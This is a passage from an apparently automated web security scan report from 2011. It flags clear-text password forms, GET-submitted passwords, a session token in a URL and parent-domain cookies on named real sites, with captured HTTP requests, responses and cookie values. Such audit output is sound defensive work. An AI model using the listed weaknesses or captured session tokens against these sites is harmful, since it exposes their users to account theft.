<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw&nbsp;<input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok"    name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

4.5. http://www.regattaregatta.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regattaregatta.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.regattaregatta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 20 Jan 2011 00:50:26 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: 9d1da0e50aa9b6d723bb7d2254c4deb6=f2f5e593b3e0e56bdba4d7906218ec7f; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: currentURI=http%3A%2F%2Fwww.regattaregatta.com%2Findex.php; expires=Fri, 21-Jan-2011 00:50:26 GMT; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Thu, 20 Jan 2011 00:50:26 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<div class="hellomid">
               <form action="/index.php/component/user/?task=login" method="post" name="form-login" id="form-login" >
                                       <fieldset class="input">
...[SNIP]...
<br />
                           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
                       </label>
...[SNIP]...

4.6. http://www.usaca.info/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usaca.info
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.usaca.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:51:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 3730abe3084fe49ecac82b2df16b8c34=6f9bhkba6goll5j4caq4ddjh17; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Tue, 10-Jan-2012 00:51:33 GMT; path=/
Last-Modified: Thu, 20 Jan 2011 00:51:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
</h3>
                   <form action="index.php" method="post" name="form-login" id="form-login" >
   USACA Contributor Login:    <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
       </label>
...[SNIP]...

4.7. http://www.w-w-i.com/velux_5_oceans_2010_race/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.w-w-i.com
Path:   /velux_5_oceans_2010_race/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:51:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=13c7e006f0c56b998c7eef7ea57f3854; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Velux 5 Oceans 2010 Race :: Online Press Office</title>
<meta name=
...[SNIP]...
<div id="search3" class="search"><form method="post" enctype="multipart/form-data" action="/velux_5_oceans_2010_race/logoffon.php"><div>
...[SNIP]...
<br><input type="password" name="pword" id="pword"><br>
...[SNIP]...

5. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-93054228_1295482822%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D405617%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D423951444%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; 
acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb778475=5_[r^XI()vrO@Pn0nf8M!j@7*?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviPzkMt5lmDXglBWHfHSmrEELGfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAA_gYBAgUCAAUAAAAAlR4hLwAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482822%29%3Buf%28%27r%27%2C+151609%2C+1295482822%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2811%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2887%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28619%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28620%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28621%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)'qHqWd-AGmScENVx-p:Y9b66ZCJLN[8yvY$hcwDwhp^RbpUUZcwln=gw`]wKC0A)'9Dj6XfCjr1a#[D:I(3<csJ3xssMdQ3gcc=Zx1u*B$99h/3z-gm; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:20:22 GMT
Content-Length: 504

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://tap.rubiconproject.com/oz/feeds/appnexus/tokens?token=4760492999213801733&expires=30" width="1" height="1"/>');

6. Password field submitted using GET method
There are 3 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


6.1. http://americascup.mediaaccess.evolix.net/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://americascup.mediaaccess.evolix.net
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: americascup.mediaaccess.evolix.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:36:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=f7dd62b0baadb91dcf47f180dfeb400d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw&nbsp;<input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok"    name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

6.2. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:40:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899127717691648%3A164; expires=Fri, 21-Jan-2011 00:40:18 GMT; path=/; domain=digg.com
Set-Cookie: d=e77e75edfe85a5c092ebbce18a8db8a109d3f58ee422bb99aa8f404c459dbd21; expires=Tue, 19-Jan-2021 10:47:58 GMT; path=/; domain=.digg.com
X-Digg-Time: D=28518 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.3. http://www.americascupmedia.com/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:44:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=5df83766a88aa55095427a70359ae9f4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw&nbsp;<input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok"    name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

7. Cookie scoped to parent domain
There are 29 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


7.1. http://www.stumbleupon.com/submit

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=lvkjt5porujgfu07pt29oc6nc4; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=1329568984d378700841812.33812512; expires=Sat, 19-Feb-2011 00:51:12 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Sat, 19-Feb-2011 00:51:12 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Sat, 19-Feb-2011 00:51:12 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=99539ab0f0f4d690f31ffb8596964be6%7C%7C10%7C%7C1295484672%7C38a8ed554e38c299f37f5b3c35f57c23; expires=Sun, 17-Jan-2021 00:51:12 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7324
Date: Thu, 20 Jan 2011 00:51:12 GMT
X-Varnish: 1927125712
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...

7.2. http://2822.v.fwmrm.net/ad/g/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2822.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/g/1?nw=10274&pvrn=Insert%20Random%20Number%20Here&csid=display&resp=ad;;ptgt=s&envp=g_js&slid=Rectangle&w=300&h=250 HTTP/1.1
Host: 2822.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://blip.tv/file/4639878
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="a104_5562153497824379009"; _vr="1295039779..246255~312652~,"; _cph="1295039779.438.1.1,"; _sc="sg122034.1295039779.1295039779.28800.0.0,"; _wr="g122034"

Response

HTTP/1.1 200 OK
Set-Cookie: _sid="c115_5564057886323802955";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1295483178..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg23001.1295483179.1295483179.28800.0.0,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
X-FW-Power-By: Dot
Content-Type: text/javascript
Cteonnt-Length: 126
Pragma: no-cache
Date: Thu, 20 Jan 2011 00:26:19 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3c45525d5f4f58455e445a4a423209;path=/;httponly
Content-Length: 126

document.write("<span style=\"display:inline-block; vertical-align:top; margin:125px 150px 125px 150px;\"><!-- --></span>\n");

7.3. http://2822.v.fwmrm.net/ad/l/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2822.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/l/1?last=0&ct=0&metr=127&s=a116&t=12954824355285936&adid=170504&reid=79402&arid=0&auid=&cn=defaultImpression&et=i&_cc=170504,79402,11811.,11074.11081.11744.11811.,1295482435,1&tpos=0&iw=&uxnw=&uxss=&uxct=&init=1&cr= HTTP/1.1
Host: 2822.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cph="1295039779.438.1.1,"; _sid="a116_5564054660803241609"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3545525d5f4f58455e445a4a423209; _uid="a104_5562153497824379009"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,"; _sc="sg23001.1295482428.1295482436.28800.0.0,"; _wr="g23001"

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:14:07 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g23001~1.1295482447.0,13310.1295482447.0,^";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg23001.1295482428.1295482447.28800.0.0,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Date: Thu, 20 Jan 2011 00:14:06 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


7.4. http://2822.v.fwmrm.net/ad/p/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2822.v.fwmrm.net
Path:   /ad/p/1

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /ad/p/1? HTTP/1.1
Host: 2822.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
content-type: text/xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1295039779..246255~312652~,"; _cph="1295039779.438.1.1,"; _sid="a116_5564054660803241609"; _uid="a104_5562153497824379009"; _sc="sg23001.1295482428.1295482428.28800.0.0,"; _wr="g23001"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3545525d5f4f58455e445a4a423209
Content-Length: 2465

<adRequest networkId="10274" version="1" profile="10274:blip_showplayer_as3"><customDistributor /><capabilities><supportsSlotTemplate /><explicitVideoTracking /><expectMultipleCreativeRenditions /><su
...[SNIP]...

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:13:55 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg23001.1295482428.1295482435.28800.0.0,";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
